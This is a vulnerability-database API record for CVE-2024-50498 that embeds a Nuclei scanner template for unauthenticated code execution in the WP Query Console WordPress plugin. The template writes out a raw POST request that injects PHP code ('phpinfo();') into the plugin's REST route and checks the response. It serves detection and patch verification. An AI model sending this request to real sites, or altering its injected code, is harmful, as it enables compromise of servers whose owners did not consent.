{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-50498/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-50498/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-50498/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-50498/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-50498/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-50498"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-50498"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-50498.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2024-50498\n\ninfo:\n  name: WP Query Console <= 1.0 - Remote Code Execution\n  author: s4e-io\n  severity: critical\n  description: |\n    Improper Control of Generation of Code ('Code Injection') vulnerability in LUBUS WP Query Console allows Code Injection.This issue affects WP Query Console- from n/a through 1.0.\n  impact: |\n    Attackers can exploit vulnerabilities to compromise the system.\n  remediation: |\n    Update to the latest patched version addressing CVE-2024-50498.\n  reference:\n    - https://github.com/RandomRobbieBF/CVE-2024-50498\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-query-console/wp-query-console-10-unauthenticated-remote-code-execution\n    - https://patchstack.com/database/vulnerability/wp-query-console/wordpress-wp-query-console-plugin-1-0-remote-code-execution-rce-vulnerability?_s_id=cve\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-50498\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2024-50498\n    cwe-id: CWE-94\n    epss-score: 0.52905\n    epss-percentile: 0.98924\n    cpe: cpe:2.3:a:lubus:wp_query_console:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: lubus\n    product: wp_query_console\n    framework: wordpress\n    fofa-query: body=\"wp-content/plugins/wp-query-console/\"\n  tags: cve,cve2024,wp,wordpress,wp-plugin,wp-query-console,rce,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /index.php?rest_route=/wqc/v1/query HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"queryArgs\":\"phpinfo();\",\"queryType\":\"post\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"PHP Extension\", \"PHP Version\")'\n          - 'contains(content_type, \"application/json\")'\n          - \"status_code == 200\"\n        condition: and\n# digest: 4a0a00473045022100b4ff7e03362cedf1251bc0d3a0d08713e492b1953c7f004aa8f01404f5bfa52b02207000c5599e8d6e4ba544c18020d6c50afbec41080a640c88682f51311adb694d:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-50498"
}